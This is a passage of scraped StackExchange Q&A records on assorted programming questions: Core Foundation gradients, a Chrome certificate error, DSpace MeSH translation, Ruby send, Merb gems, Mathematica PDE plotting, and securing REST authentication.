calls. The releasing is done in ARC, and not a Core Foundation call.\nComment: @Cthutu: Well, the releasing of the UIColor and the array is done in ARC, and the releasing of the CGColor is done by the array (which may or may not be ARC on the inside). But yeah. 
Same difference all around.\nComment: @MattH.: Another way to do the latter step is `CFBridgingRelease`.\nAnswer: Try just using a <code>CFArrayRef<\/code> and avoid the bridging and see whether it makes a difference.\n<code>CGFloat topColorComps[] = {51.0f\/255.0f, 51.0f\/255.0f, 51.0f\/255.0f, 1.0f};\nCGFloat bottomColorComps[] = {48.0f\/255.0f, 48.0f\/255.0f, 48.0f\/255.0f, 1.0f}; \n\nCGColorSpaceRef rgb = CGColorSpaceCreateDeviceRGB();\nCGColorRef topColor = CGColorCreate(rgb, topColorComps);\nCGColorRef bottomColor = CGColorCreate(rgb, bottomColorComps);\nCGColorSpaceRelease(rgb);\n\nCFMutableArrayRef colorArray = CFArrayCreateMutable(NULL, 2, &kCFTypeArrayCallbacks);\nCFArrayAppendValue(colorArray, topColor);\nCFArrayAppendValue(colorArray, bottomColor);\n\nCGGradientRef gradient = CGGradientCreateWithColors(colorSpace, colorArray, colorLocations);\n\nCFRelease(colorArray);\nCFRelease(topColor);\nCFRelease(bottomColor);\n<\/code>\nComment: @ArtSabintsev: Oh bugger, that's a Mac OS X only function, just a minute, I'll update again.\nComment: Thanks for your help. Sadly, it crashes on `CFArrayAppendValue(colorArray, topColor)` when running it on my device.\nComment: @ArtSabintsev: The problem could be the use of `UIColor`. I've edited the example above, this time, you own everything.\nComment: thanks! Now I'm getting `CGColorCreateGenericRGB is unavailable`. Looking into this.\nComment: Casing error in this answer - should be `&kCFTypeArrayCallBacks`\n","meta":{"source":"stackoverflow","title":"Issue with CFArrayRef and NSArray when drawing gradient using ARC","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google Chrome and Certificate Problem\n\nQuestion: When I try to connect google.com and youtube.com with Chrome, I got the error below;\n1.\n\n2.\n\n<code>Your connection is not private\n\nAttackers might be trying to steal your information from www.google.com.tr (for example, passwords, messages, or credit cards). 
NET::ERR_CERT_AUTHORITY_INVALID\nSubject: *.google.com\nIssuer: Google Internet Authority G2\nExpires on: Aug 23, 2017\nCurrent date: Jun 11, 2017\nPEM encoded chain:\n-----BEGIN CERTIFICATE-----\nMIIHrjCCBpagAwIBAgIINiBFmn0c2QIwDQYJKoZIhvcNAQELBQAwSTELMAkGA1UE\nBhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMTHEdvb2dsZSBJbnRl\ncm5ldCBBdXRob3JpdHkgRzIwHhcNMTcwNTMxMTYzMTQ4WhcNMTcwODIzMTYzMTAw\nWjBmMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwN\nTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzEVMBMGA1UEAwwMKi5n\nb29nbGUuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEUtdPdcCQwf3TdMee\n5yktIGnT+3uCe+1r5ibOkpdiyPSRiW5iEbSFxVlP8CNaPX3R5v42SaHBdIvlZymx\niA99y6OCBUYwggVCMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjALBgNV\nHQ8EBAMCB4AwggQFBgNVHREEggP8MIID+IIMKi5nb29nbGUuY29tgg0qLmFuZHJv\naWQuY29tghYqLmFwcGVuZ2luZS5nb29nbGUuY29tghIqLmNsb3VkLmdvb2dsZS5j\nb22CBiouZy5jb4IOKi5nY3AuZ3Z0Mi5jb22CFiouZ29vZ2xlLWFuYWx5dGljcy5j\nb22CCyouZ29vZ2xlLmNhggsqLmdvb2dsZS5jbIIOKi5nb29nbGUuY28uaW6CDiou\nZ29vZ2xlLmNvLmpwgg4qLmdvb2dsZS5jby51a4IPKi5nb29nbGUuY29tLmFygg8q\nLmdvb2dsZS5jb20uYXWCDyouZ29vZ2xlLmNvbS5icoIPKi5nb29nbGUuY29tLmNv\ngg8qLmdvb2dsZS5jb20ubXiCDyouZ29vZ2xlLmNvbS50coIPKi5nb29nbGUuY29t\nLnZuggsqLmdvb2dsZS5kZYILKi5nb29nbGUuZXOCCyouZ29vZ2xlLmZyggsqLmdv\nb2dsZS5odYILKi5nb29nbGUuaXSCCyouZ29vZ2xlLm5sggsqLmdvb2dsZS5wbIIL\nKi5nb29nbGUucHSCEiouZ29vZ2xlYWRhcGlzLmNvbYIPKi5nb29nbGVhcGlzLmNu\nghQqLmdvb2dsZWNvbW1lcmNlLmNvbYIRKi5nb29nbGV2aWRlby5jb22CDCouZ3N0\nYXRpYy5jboINKi5nc3RhdGljLmNvbYIKKi5ndnQxLmNvbYIKKi5ndnQyLmNvbYIU\nKi5tZXRyaWMuZ3N0YXRpYy5jb22CDCoudXJjaGluLmNvbYIQKi51cmwuZ29vZ2xl\nLmNvbYIWKi55b3V0dWJlLW5vY29va2llLmNvbYINKi55b3V0dWJlLmNvbYIWKi55\nb3V0dWJlZWR1Y2F0aW9uLmNvbYIHKi55dC5iZYILKi55dGltZy5jb22CG2FjY291\nbnRzLmRiODMzOTUzLmdvb2dsZS5jboIaYW5kcm9pZC5jbGllbnRzLmdvb2dsZS5j\nb22CC2FuZHJvaWQuY29tghtkZXZlbG9wZXIuYW5kcm9pZC5nb29nbGUuY26CHGRl\ndmVsb3BlcnMuYW5kcm9pZC5nb29nbGUuY26CBGcuY2+CBmdvby5nbIIUZ29vZ2xl\nLWFuYWx5dGljcy5jb22CCmdvb2dsZS5jb22CEmdvb2dsZWNvbW1lcmNlLmNvbYIb\nc2V0dGluZ3MuZGI4MzM5NTMuZ29vZ2xlLmNughhzb3VyY2UuYW5kcm9pZC5nb29n\nbGUuY26CCnVyY2hpbi5jb22CCnd3dy5nb28uZ2yCCHlvdXR1LmJlggt5b3V0dWJl\nLmNvbYIUeW91dHViZWVkdWNhdGlvbi5jb22CBXl0LmJlMGgGCCsGAQUFBwEBBFww\nWjArBggrBgEFBQcwAoYfaHR0cDovL3BraS5nb29nbGUuY29tL0dJQUcyLmNydDAr\nBggrBgEFBQcwAYYfaHR0cDovL2NsaWVudHMxLmdvb2dsZS5jb20vb2NzcDAdBgNV\nHQ4EFgQUC5nZLA7hVNxUrvyuwKYkhEo7l8MwDAYDVR0TAQH\/BAIwADAfBgNVHSME\nGDAWgBRK3QYWG7z2aLV29YG2u2IaulqBLzAhBgNVHSAEGjAYMAwGCisGAQQB1nkC\nBQEwCAYGZ4EMAQICMDAGA1UdHwQpMCcwJaAjoCGGH2h0dHA6Ly9wa2kuZ29vZ2xl\nLmNvbS9HSUFHMi5jcmwwDQYJKoZIhvcNAQELBQADggEBAHpphgp3P2YUEgoLEM3j\n7qqS4nDdyW7Jnl65Tkbr2ID39DDjzOMFArIs3gROG7HANgxNz+fwtO+Fk4XtR1kh\na5kkgNhlIlsP50hA9Yk5qd0lcxsA7gSLbac0PMi78RBZVtm4BLIU6Sswejy+zKSh\n541vSuCwxhzNvJJq1YOkXxeEmgdZO8wLGpHL4jqHi3+PfGkhZXyDtwdc+sbc39Fr\n1cp1l0SXBaNzfSybykmeuYgamARpW1TbP9IMvrcRaatn5esRTCXCHerDy1UKKhEb\nmTm98a55roTCnF2VKnwvp8tIlTxFgY1W1h0uLezG2jNcOs4htFpAlfSPZgP2P4WN\n4og=\n-----END CERTIFICATE-----\n-----BEGIN 
CERTIFICATE-----\nMIIEKDCCAxCgAwIBAgIQAQAhJYiw+lmnd+8Fe2Yn3zANBgkqhkiG9w0BAQsFADBC\nMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEbMBkGA1UEAxMS\nR2VvVHJ1c3QgR2xvYmFsIENBMB4XDTE3MDUyMjExMzIzN1oXDTE4MTIzMTIzNTk1\nOVowSTELMAkGA1UEBhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMT\nHEdvb2dsZSBJbnRlcm5ldCBBdXRob3JpdHkgRzIwggEiMA0GCSqGSIb3DQEBAQUA\nA4IBDwAwggEKAoIBAQCcKgR3XNhQkToGo4Lg2FBIvIk\/8RlwGohGfuCPxfGJziHu\nWv5hDbcyRImgdAtTT1WkzoJile7rWV\/G4QWAEsRelD+8W0g49FP3JOb7kekVxM\/0\nUw30SvyfVN59vqBrb4fA0FAfKDADQNoIc1Fsf\/86PKc3Bo69SxEE630k3ub5\/DFx\n+5TVYPMuSq9C0svqxGoassxT3RVLix\/IGWEfzZ2oPmMrhDVpZYTIGcVGIvhTlb7j\ngEoQxirsupcgEcc5mRAEoPBhepUljE5SdeK27QjKFPzOImqzTs9GA5eXA37Asd57\nr0Uzz7o+cbfe9CUlwg01iZ2d+w4ReYkeN8WvjnJpAgMBAAGjggERMIIBDTAfBgNV\nHSMEGDAWgBTAephojYn7qwVkDBF9qn1luMrMTjAdBgNVHQ4EFgQUSt0GFhu89mi1\ndvWBtrtiGrpagS8wDgYDVR0PAQH\/BAQDAgEGMC4GCCsGAQUFBwEBBCIwIDAeBggr\nBgEFBQcwAYYSaHR0cDovL2cuc3ltY2QuY29tMBIGA1UdEwEB\/wQIMAYBAf8CAQAw\nNQYDVR0fBC4wLDAqoCigJoYkaHR0cDovL2cuc3ltY2IuY29tL2NybHMvZ3RnbG9i\nYWwuY3JsMCEGA1UdIAQaMBgwDAYKKwYBBAHWeQIFATAIBgZngQwBAgIwHQYDVR0l\nBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA0GCSqGSIb3DQEBCwUAA4IBAQDKSeWs\n12Rkd1u+cfrP9B4jx5ppY1Rf60zWGSgjZGaOHMeHgGRfBIsmr5jfCnC8vBk97nsz\nqX+99AXUcLsFJnnqmseYuQcZZTTMPOk\/xQH6bwx+23pwXEz+LQDwyr4tjrSogPsB\nE4jLnD\/lu3fKOmc2887VJwJyQ6C9bgLxRwVxPgFZ6RGeGvOED4Cmong1L7bHon8X\nfOGLVq7uZ4hRJzBgpWJSwzfVO+qFKgE4h6LPcK2kesnE58rF2rwjMvL+GMJ74N87\nL9TQEOaWTPtEtyFkDbkAlDASJodYmDkFOA\/MgkgMCkdm7r+0X8T\/cKjhf4t5K7hl\nMqO5tzHpCvX2HzLc\n-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----\nMIIDVDCCAjygAwIBAgIDAjRWMA0GCSqGSIb3DQEBBQUAMEIxCzAJBgNVBAYTAlVT\nMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMRswGQYDVQQDExJHZW9UcnVzdCBHbG9i\nYWwgQ0EwHhcNMDIwNTIxMDQwMDAwWhcNMjIwNTIxMDQwMDAwWjBCMQswCQYDVQQG\nEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEbMBkGA1UEAxMSR2VvVHJ1c3Qg\nR2xvYmFsIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2swYYzD9\n9BcjGlZ+W988bDjkcbd4kdS8odhM+KhDtgPpTSEHCIjaWC9mOSm9BXiLnTjoBbdq\nfnGk5sRgprDvgOSJKA+eJdbtg\/OtppHHmMlCGDUUna2YRpIuT8rxh0PBFpVXLVDv\niS2Aelet8u5fa9IAjbkU+BQVNdnARqN7csiRv8lVK83Qlz6cJmTM386DGXHKTubU\n1XupGc1V3sjs0l44U+VcT4wt\/lAjNvxm5suOpDkZALeVAjmRCw7+OC7RHQWa9k0+\nbw8HHa8sHo9gOeL6NlMTOdReJivbPagUvTLrGAMoUgRx5aszPeE4uwc2hGKceeoW\nMPRfwCvocWvk+QIDAQABo1MwUTAPBgNVHRMBAf8EBTADAQH\/MB0GA1UdDgQWBBTA\nephojYn7qwVkDBF9qn1luMrMTjAfBgNVHSMEGDAWgBTAephojYn7qwVkDBF9qn1l\nuMrMTjANBgkqhkiG9w0BAQUFAAOCAQEANeMpauUvXVSOKVCUn5kaFOSPeCpilKIn\nZ57QzxpeR+nBsqTP3UEaBU6bS+5Kb1VSsyShNwrrZHYqLizz\/Tt1kL\/6cdjHPTfS\ntQWVYrmm3ok9Nns4d0iXrKYgjy6myQzCsplFAMfOEVEiIuCl6rYVSAlk6l5PdPcF\nPseKUgzbFbS9bZvlxrFUaKnjaZC2mqUPuLk\/IH2uSrW4nOQdtqvmlKXBx4Ot2\/Un\nhw4EbNX\/3aBd7YdStysVAq45pmp06drE57xNNB6pXE0zX5IJL4hmXXeXxx12E6nV\n5fEWCRE11azbJHFwLJhWC9kXtNHjUStedejV0NxPNO3CBWaAocvmMw==\n-----END CERTIFICATE-----\n\nAutomatically report details of possible security incidents to Google. Privacy policy\nReloadHIDE ADVANCED\nwww.google.com.tr normally uses encryption to protect your information. When Google Chrome tried to connect to www.google.com.tr this time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be www.google.com.tr, or a Wi-Fi sign-in screen has interrupted the connection. Your information is still secure because Google Chrome stopped the connection before any data was exchanged.\n\nYou cannot visit www.google.com.tr right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later. 
Learn more.\n<\/code>\nI have no problem at all with Firefox, Edge etc, only with Google Chrome. I have tried to install Chrome Canary, it was working without any problem for a few minutes then it starts to give the very same error as above. \nStrangely, Chrome starts working again, then it stopped working again!\nBy the way, I have a VPN addon on chrome, it stops working too :(\n\nDate and Time is correct\nI have no antivirus installed, just Comodo Firewall. I closed the firewall, the same problem continued.\nI have installed MalwareByte to check if I have any, no malware.\n\nWhat could be going on?\nNOTE: I got a crack: https:\/\/www.youtube.com\/watch?v=_Zzx1ai0_Xs&feature=youtu.be\nthis happens because there is chrome task manager icon. when I remove it, the problem solves itself as you see in youtube video. why could be this happening?\nComment: The subject on the cert is *.google.com which doesn't seem to apply to google.com.tr\nComment: @iain: the CN of the cert for google.com.tr is actually *.google.com. But it has lots of subject alternative names including one for google.com.tr. And it did not complain about the name but about an invalid certificate authority\nComment: @Oray: this looks like a bug for me. The certificates themselves look fine.\nComment: @Steffen: is it normal to see \"Expires on: Aug 23, 2017\nCurrent date: Jun 11, 2017\" ?\nComment: @pcalkins: For a question asked on Jun 11, 2017 this is pretty normal.\nAnswer: The solution to this problem is simply stupid, this issue is most likely caused by a time mismatch between the server and your machine. Check the time on your host and reconfigure NTP client to pull the time from the internet. I have experienced this issue in the past with a windows tablet device that had battery issue and was not keeping the date and time when the battery was fully depleeted.\nYou can use flow graph to view more details on the handshake and ssl negotiation to know more precisely what is the issue, although it is most likely time orientned. Alternatively you can debug your connection with OpenSSL if you have it installed on your machine:\n<code>openssl s_client -debug -connect google.com.tr:443 -tls1_2<\/code>\nAnswer: So the owners or your router that you've connected to, it shows all ip's that has been connected to on the main router and someone or you didn't know has it on blocked to unaccess to the web pages. \nIf it's your router then fix it to where you can make that ip on the router gain access to the YouTube, gmail, or other websites again. It has been you or someone that's blocked it. Almost 90% if you cant fix it with the time and other simple fixable problems, then first you need to ask to (or you) login to your (owners) router, then a list of ip's that will pop up, and find that you ip that's blocking it. Then somewhere there should be a section to unblock it. \nNot all routers are all the same, so that info need you kinda got to find on your own, but it shouldn't be that hard tho. Play around to find it and it'll eventually unblock\nSometimes there are reasons for it being blocked, but you need to ask or not, just use a vpn, it works for me. Test them and see what works. If the vpn or time thing does not work, then you need the router to unblock it. 
That's the only way.\nComment: The OP doesn't seem to have issues reaching the website per se, rather is concerned about the fact it appears to present an invalid certificate - using a VPN might help, but if you mention checking the local access point\/router, then it would be worth recommending at least validating DNS settings.\nComment: It is most likely presenting the correct certificate but the issue is actually establishing the session. OP can parse the certificate with open ssl `openssl x509 -in infile -noout -text` to see if the certificate is correct. He can also use the developer tools and flow graph to establish what causing the issue or debug ssl with openssl.\n","meta":{"source":"security.stackexchange","title":"Google Chrome and Certificate Problem","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to translate or replace subject terms in DSpace if I have the translations in a file\n\nQuestion: I would like to translate the subject(MeSH) terms displayed in item-view.xsl in the DSPace instance that I'm maintaining if the language is switched. Previously I am using the code below (I added this in <code>XSLUtils.java<\/code> class) to lookup to Babelmesh site and translate it on the fly.\n<code> public static String lookupBabelMeSH(String term, String lang) {\n try {\n URLConnection babelMeshConn = (new URL(\"https:\/\/babelmesh.nlm.nih.gov\/mesh_trans.php?oterm=\" + URLEncoder.encode(term, \"UTF-8\") + \"&in=ENG&out=\" + lang)).openConnection();\n babelMeshConn.setConnectTimeout(5000);\n babelMeshConn.setReadTimeout(5000);\n\n BufferedReader in = new BufferedReader(new InputStreamReader(babelMeshConn.getInputStream(), \"UTF-8\"));\n String value = in.readLine();\n in.close();\n\n if (!StringUtils.isEmpty(value)) {\n return value;\n }\n } catch (MalformedURLException mue) {\n\n } catch (IOException ioe) {\n\n }\n\n return null;\n}\n<\/code>\nI then used it in <code>item-view.xsl<\/code> like this:\n<code> <xsl:choose>\n <xsl:when test=\"$active-locale!='en'\">\n <xsl:variable name=\"current-locale\">\n <xsl:if test=\"$active-locale='fr'\">\n <xsl:text>FRE<\/xsl:text>\n <\/xsl:if>\n <xsl:if test=\"$active-locale='zh'\">\n <xsl:text>CHN<\/xsl:text>\n <\/xsl:if>\n <\/xsl:variable>\n <xsl:variable name=\"translation\">\n <xsl:value-of select=\"util:lookupBabelMeSH(node(),$current-locale)\"\/>\n <\/xsl:variable>\n <xsl:choose>\n <xsl:when test=\"$translation=''\">\n <xsl:value-of select=\"node()\"\/>\n <\/xsl:when>\n <xsl:otherwise>\n <xsl:value-of select=\"$translation\"\/>\n <\/xsl:otherwise>\n <\/xsl:choose>\n <\/xsl:when>\n <xsl:otherwise>\n <xsl:value-of select=\"node()\"\/>\n <\/xsl:otherwise>\n <\/xsl:choose>\n<\/code>\nNow, I would like to translate the text without calling BabelMesh site everytime the language is switched since there's a limit to the number of requests. Also, since the url to BabelMesh is hardcoded, any changes to BabelMesh service will break the rendering of the translation. I only need to translate the terms into chinese and french. I have the translations located in <code>[dspace]\/config\/mesh<\/code> directory. 
The files are named <code>mterms_fr<\/code> and <code>mterms_zh<\/code> for french and chinese translations respectively.\nThe contents of these files looked like these:\nmterms_fr\n<code>Acanthocheilonemiasis::acanthocheilonemiase\nAcanthocytes::ACANTHOCYTE\nAcantholysis::ACANTHOLYSE\nAcanthoma::ACANTHOME\nAcanthopodina::ACANTHOPODINA\nAcanthosis Nigricans::ACANTHOSIS NIGRICANS\nAcarbose::ACARBOSE\nAcari::ACARIEN\nAcaricides::Acaricides\nAcaridae::ACARIDAE\nAcatalasia::ACATALASIE\nAccelerated Idioventricular Rhythm::RYTHME IDIOVENTRICULAIRE ACCELERE\nAcceleration::ACCELERATION\n<\/code>\nmterms_zh \n<code>Acanthocheilonemiasis::\u68d8\u5507\u866b\u75c5\nAcanthocytes::\u68d8\u5f62\u7ea2\u7ec6\u80de\nAcantholysis::\u76ae\u80a4\u68d8\u5c42\u677e\u89e3\nAcanthoma::\u68d8\u76ae\u7624\nAcanthopodina::Acanthopodina\nAcanthosis Nigricans::Acanthosis Nigricans\nAcarbose::Acarbose\nAcari::Acari\nAcaricides::Acaricides\nAcaridae::Acaridae\nAcatalasia::Acatalasia\nAccelerated Idioventricular Rhythm::Accelerated Idioventricular Rhythm\nAcceleration::\u52a0\u901f\u5ea6\n<\/code>\nIf you noticed, the <code>::<\/code> is the separator between the english terms and the translations. If there's no translation for that term, the english term is retained (eg <code>Acaricides<\/code>).\nSo would it be possible to just lookup to these files from the <code>[dspace]\/config\/mesh<\/code> directory and do the translation on-the-fly?\nEDIT\nI would like to add that if ever the term is not found in the translation file, it should be returned as is (eg <code>some random text<\/code> should return <code>some random text<\/code>) since it is expected that I have no control to what users will input in the subject field (ie via batch import).\nThanks in advance!\nAnswer: You can try something like this (added to XSLUtils.java):\n<code> private static Properties chinnese = null;\n private static Properties french = null;\n\n static{\n\n try {\n chinnese = new Properties();\n String mterms_zhPath=ConfigurationManager.getProperty(\"mterms_zh.path\");\n chinnese.load(new InputStreamReader(new FileInputStream(new File(mterms_zhPath)), \"UTF8\"));\n french = new Properties();\n String mterms_frPath=ConfigurationManager.getProperty(\"mterms_fr.path\"); \n french.load(new InputStreamReader(new FileInputStream(new File(mterms_frPath)), \"UTF8\"));\n } catch (UnsupportedEncodingException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (FileNotFoundException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (IOException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n }\n }\n\n public static String lookupMeSH(String term, String lang) {\n String translated=null;\n if(\"zh\".equals(lang)){\n translated=chinnese.getProperty(term);\n }else if(\"fr\".equals(lang)){\n translated=french.getProperty(term);\n }\n return translated;\n }\n<\/code>\nAt dspace.cfg you should add the path of files:\n<code>mterms_zh.path= \/put\/the\/file\/path\nmterms_fr.path=\/home\/dspace_instalation\/config\/mterms_fr\n<\/code>\ncheck langs comparations and file adquisition.\nthen change:\n<code><xsl:value-of select=\"util:lookupBabelMeSH(node(),$current-locale)\"\/>\n<\/code>\nfor\n<code><xsl:value-of select=\"util:lookupMeSH(node(),$current-locale)\"\/>\n<\/code>\nat the xsl\nAnd replace the files separator from \"::\" to \"=\"\nADDED full running class:\n<code>import java.io.File;\nimport java.io.FileInputStream;\nimport java.io.FileNotFoundException;\nimport 
java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.UnsupportedEncodingException;\nimport java.util.Properties;\n\npublic class Test3 {\n private static Properties chinnese = null;\n private static Properties french = null;\n\nstatic{\n\n chinnese = new Properties();\n try {\n String mterms_zhPath=\"D:\/mterms_fr\"; \n chinnese.load(new InputStreamReader(new FileInputStream(new File(mterms_zhPath)), \"UTF8\"));\n french = new Properties();\n String mterms_frPath=\"D:\/mterms_fr\"; \n french.load(new InputStreamReader(new FileInputStream(new File(mterms_frPath)), \"UTF8\"));\n } catch (UnsupportedEncodingException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (FileNotFoundException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (IOException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n }\n }\n\n public static String lookupMeSH(String term, String lang) {\n String translated=null;\n if(\"zh\".equals(lang)){\n translated=chinnese.getProperty(term);\n }else if(\"fr\".equals(lang)){\n translated=french.getProperty(term);\n }\n return translated;\n }\n public static void main (String [] args) { \n \/\/ Test3 test3=new Test3();\n \/\/XSLUtils s = new XSLUtils();\n System.out.println(lookupMeSH(\"Acari\", \"fr\")); }\n}\n<\/code>\nComment: thanks for the updated code. After running multiple tests with different terms, I discovered that the code does not work for terms that have spaces (eg `Accelerated Idioventricular Rhythm`). It returned `null`.\nComment: try replacing whitespaces at terms files with \\u0020. one two = value TO\none\\u0020two = value\nComment: Ad\u00e1n, thanks for this. I'm having errors in my IDE though. Particularly in the `getClass()` portion where it says \"Non static method 'getClass()' cannot be referenced from a static context\". Also, how can this method locate the mesh terms? I'm actually expecting that `ConfigurationManager.propertyNames` will be used to reference the files. Please advice and thanks in advance.\nComment: I changed the code and it compile, but i dont tried it.\nComment: Hi Ad\u00e1n. I've added this code for testing in my IDE: `public static void main (String [] args) { XSLUtils s = new XSLUtils();System.out.println(lookupMeSH(\"Health\", \"fr\")); }` I also replaced the values of `String mterms_frPath` to the absolute path of the file. When I run the code, I received this error: `Exception in thread \"main\" java.lang.NullPointerException at org.dspace.app.xmlui.utils.XSLUtils.lookupMeSH(XSLUtils.java:145)` which is referring to this line of code: `translated=french.getProperty(term);`. It seems the contents of this file are not loaded. Thanks again for the help.\nComment: Thanks Ad\u00e1n. Replacing spaces with `\\u0020` did indeed worked for terms with spaces. Unfortunately, this only works if I run `XSLUtils.main()` but not when I tried it on my DSpace instance. I tried using absolute paths after using `ConfigurationManager.getProperty` did not work, and it's still not working. I'm starting to doubt if this is possible. I would gladly mark your answer as the accepted answer if this will work in my DSpace instance. Perhaps there is something that I might be missing and would be very glad to hear from you. 
Thanks again.\n","meta":{"source":"stackoverflow","title":"How to translate or replace subject terms in DSpace if I have the translations in a file","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do pass parameters with the `send` function\n\nQuestion: I'm using cancan in a Rails 3.2 app, and in the abilities.rb classing have a method for each role's abilities\n<code>#ability.rb\n\ndef initialize(user)\n user_or_admin ||= User.new\n\n user.roles.each do |role| \n send(role.name)\n end\nend\n\ndef role_name_a\n\nend\n\ndef role_name_b\n\nend\n<\/code>\nSome of these methods require access to the user record, how do I pass it with the send function?\ne.g. I want to do something like\n<code>send(role.name)(user)<\/code>\nand then\n<code>def role_name_a(user)<\/code>\nBut this doesn't work. Grateful for any ideas.\nAnswer: The arguments are the second parameter to <code>send<\/code>. The first argument is the method name as a symbol.\n<code>send :\"#{role.name}\", user\n<\/code>\nYou should try looking at Ruby's documentation for questions like this. The language is well documented.\nhttp:\/\/ruby-doc.org\/core-1.9.3\/Object.html#method-i-send\nComment: great, thanks for the reference, I was looking in the wrong place!\nAnswer: I'm not sure if this is best practice but it's what is in the cancan documentation.\n<code>def initialize(user)\n @user = user || User.new\n\n user.roles.each do |role| \n send(role.name)\n end\nend\n\ndef role_name_a\n can :manage, User, id: @user.id\nend\n\ndef role_name_b\n\nend\n<\/code>\n","meta":{"source":"stackoverflow","title":"How do pass parameters with the `send` function","dup_signals":{}},"subset":"stackexchange"} +{"text":"Merb having issues requiring gems\n\nQuestion: I have merb setup but when I try to run it I get issue with any gems I try to include, e.g. I have the following:\n<code>require 'RMagick'\n<\/code>\nThe rmagick gem is installed, and doing the above in irb (after requiring <code>rubygems<\/code> works as expected) even putting <code>require 'rubygems'<\/code> before I require RMagick doesn't fix the issue.\nAnswer: Ah-ha seems that it was getting confused with the frozen(?) gems in the gems\/ directory under my app, removing that completely fixed the issue. Will look into that further.\n","meta":{"source":"stackoverflow","title":"Merb having issues requiring gems","dup_signals":{}},"subset":"stackexchange"} +{"text":"Contour plot for ParametricNDSolve\n\nQuestion: I want to solve a PDE in $(x,t)$ as a function of two parameters, $h$ and $w$, and then plot the times at which the solution at some $x=x_0$ is equal to a set value, as a function of $h$ and $w$. To put it more explicitly, I have a PDE\n$$F\\left(u(x,t),u_{xx}(x,t),u_t(x,t),x,h,w\\right)=0$$\nsubject to a couple boundary conditions.\nI am trying to plot the locus of points $(h,w,t)$ such that\n$$u(x_0,t;h,w)=u_0.$$\nHere's what I tried, using <code>ParametricNDSolve<\/code> and <code>ContourPlot3D<\/code>:\n<code>sol = ParametricNDSolve[{D[u[x, t], t] \n==(1 - h*UnitBox[(x - 6)\/w])*u[x, t]*(1 - u[x, t]) + D[u[x, t], {x, 2}],\nu[x, 0] == UnitBox[x],u[40, t] == u[-40, t] == 0}, u, \n{x, -40, 40}, {t, 0, 20}, {h, w}];\n\nContourPlot3D[u[h, w][20, t] \/. 
sol == 0.9, {h, 0.1, 0.9}, {w, 0.5, 10}, {t, 0, 20}]\n<\/code>\nUnfortunately, this results in a series of errors about \"[some long expression involving $u$] is neither a list of replacement rules nor a valid dispatch table and so cannot be used for replacing.\"\nWhat have I done wrong here?\nAnswer: You have another problem but this is more a calculation problem so i will not say much about it. Your problem can be solved by just substituting the function beforehand:\n<code>sol = u \/. \n ParametricNDSolve[{D[u[x, t], \n t] == (1 - h*UnitBox[(x - 6)\/w])*u[x, t]*(1 - u[x, t]) + \n D[u[x, t], {x, 2}], u[x, 0] == UnitBox[x], \n u[40, t] == u[-40, t] == 0}, u, {x, -40, 40}, {t, 0, 20}, {h, w}]\n<\/code>\nAnd you're done.\nYou can call this simply by:\n<code>ContourPlot3D[sol[h, w][20, t], {h, 0.1, 0.9}, {w, 0.5, 10}, {t, 0, 20}]\n<\/code>\nBut now you will notice, that mathematica want unbelievable many points to solve your PDE.\nI mean, we can see why. You have a really big Range of values. So i'd consider to descrease your precision\/accuracy or something. Or Increase your MaxPoints to get the full power (which will need a loooong time to plot).\n","meta":{"source":"mathematica.stackexchange","title":"Contour plot for ParametricNDSolve","dup_signals":{}},"subset":"stackexchange"} +{"text":"Securing passwords for REST Authentication\n\nQuestion: I'm developing a REST application using the Spring Framework, as as part of the requirements, we have to secure the different functions of the system to different user roles (pretty standard stuff). My current method of determining the roles for the currently logged in user is that every time they call a REST url from the frontend, I am adding a Base 64 encoded string to the request header. This string when decoded resolves to their username and a bCrypt generated password hash in this format username:hashedpassword.\nI'm slightly concerned that this is not secure, even though the request will be made over a secure HTTP connection, because it could give a potential hacker access to at least the users username. They couldn't get the password because that is just a hashed value, but they could use that hashed value to call the REST API successfully. \nHow can I secure this system properly? Do I need to add in a session token or some kind of randomly generated key for the session? \nMy followup question is then how can I do that RESTfully? I was thinking that I could generate (using bCrypt) a hash that represented the username:hashedpassword together on login, save that to the database and check against that whenever a REST call is made. When the user logs out, just set that to null. Rinse and Repeat. That way any potential attacker would only get a single bCrypt string that wouldn't expose the username, but they could still use that string to call the REST API.\nComment: Please see http:\/\/stackoverflow.com\/questions\/3461298\/password-hashing-non-ssl \n\nand\n\nhttp:\/\/security.stackexchange.com\/questions\/53952\/rest-security-standards\/53973\n\nand\n\nhttp:\/\/security.stackexchange.com\/questions\/7057\/i-just-send-username-and-password-over-https-is-this-ok\nComment: If you want to add an answer containing a link to that last post, I'll mark it as correct, that's exactly what I was looking for! Thanks so much!\nComment: why are you reinventing the wheel? It's not like you're the first person ever to use REST. 
